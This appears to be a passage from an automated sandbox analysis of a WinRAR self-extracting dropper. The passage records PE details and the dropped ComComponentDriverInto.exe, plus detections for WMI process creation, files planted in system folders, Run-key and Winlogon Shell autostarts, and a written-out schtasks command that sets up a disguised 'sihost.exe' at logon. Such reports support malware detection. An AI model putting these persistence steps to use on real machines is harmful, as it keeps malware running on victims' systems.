                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeDirectory created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeDirectory created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\86b7f9ef8ac2e1Jump to behavior
                        Source: KzLetzDiM8.exeStatic file information: File size 1896756 > 1048576
                        Source: KzLetzDiM8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: KzLetzDiM8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: KzLetzDiM8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: KzLetzDiM8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: KzLetzDiM8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: KzLetzDiM8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: KzLetzDiM8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                        Source: KzLetzDiM8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: KzLetzDiM8.exe
                        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.pdb source: ComComponentDriverInto.exe, 00000008.00000002.2014307419.000000000301B000.00000004.00000800.00020000.00000000.sdmp
                        Source: KzLetzDiM8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: KzLetzDiM8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: KzLetzDiM8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: KzLetzDiM8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: KzLetzDiM8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline"
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline"Jump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeFile created: C:\fontdriversavescrt\__tmp_rar_sfx_access_check_6636546Jump to behavior
                        Source: KzLetzDiM8.exeStatic PE information: section name: .didat
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001FF640 push ecx; ret 0_2_001FF653
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001FEB78 push eax; ret 0_2_001FEB96
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeCode function: 8_2_00007FFD9BAB4726 pushfd ; iretd 8_2_00007FFD9BAB4729
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeCode function: 8_2_00007FFD9BEBE5C9 pushad ; iretd 8_2_00007FFD9BEBE5D9
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeCode function: 81_2_00007FFD9BAA4726 pushfd ; iretd 81_2_00007FFD9BAA4729
                        Source: ComComponentDriverInto.exe.0.drStatic PE information: section name: .text entropy: 7.58091390366067
                        Source: OXiaaPzsOIsoqrAHYxAVs.exe.8.drStatic PE information: section name: .text entropy: 7.58091390366067
                        Source: sihost.exe.8.drStatic PE information: section name: .text entropy: 7.58091390366067
                        Source: ComComponentDriverInto.exe.8.drStatic PE information: section name: .text entropy: 7.58091390366067
                        Source: WmiPrvSE.exe.8.drStatic PE information: section name: .text entropy: 7.58091390366067

                        Persistence and Installation Behavior

                        barindex
                        Creates processes via WMI
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Infects executable files (exe, dll, sys, html)
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\Users\user\Desktop\gLKxhGkC.logJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\Users\user\Desktop\rzpnRRfk.logJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\Users\user\Desktop\IGGSkEKz.logJump to dropped file
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeFile created: C:\fontdriversavescrt\ComComponentDriverInto.exeJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\Users\user\Desktop\jwqNoTvv.logJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\Users\user\Desktop\ppTmQzAj.logJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\Users\Default\Documents\sihost.exeJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\Users\user\Desktop\izOFSTgA.logJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\Users\user\Desktop\AdxdALuR.logJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\fontdriversavescrt\WmiPrvSE.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\Users\user\Desktop\izOFSTgA.logJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\Users\user\Desktop\jwqNoTvv.logJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\Users\user\Desktop\IGGSkEKz.logJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\Users\user\Desktop\AdxdALuR.logJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\Users\user\Desktop\rzpnRRfk.logJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\Users\user\Desktop\ppTmQzAj.logJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile created: C:\Users\user\Desktop\gLKxhGkC.logJump to dropped file

                        Boot Survival

                        barindex
                        Creates an undocumented autostart registry key
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                        Creates multiple autostart registry keys
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OXiaaPzsOIsoqrAHYxAVsJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihostJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComComponentDriverIntoJump to behavior
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default User\Documents\sihost.exe'" /rl HIGHEST /f
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComComponentDriverIntoJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComComponentDriverIntoJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComComponentDriverIntoJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComComponentDriverIntoJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihostJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihostJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihostJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihostJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OXiaaPzsOIsoqrAHYxAVsJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OXiaaPzsOIsoqrAHYxAVsJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OXiaaPzsOIsoqrAHYxAVsJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OXiaaPzsOIsoqrAHYxAVsJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComComponentDriverIntoJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComComponentDriverIntoJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComComponentDriverIntoJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComComponentDriverIntoJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
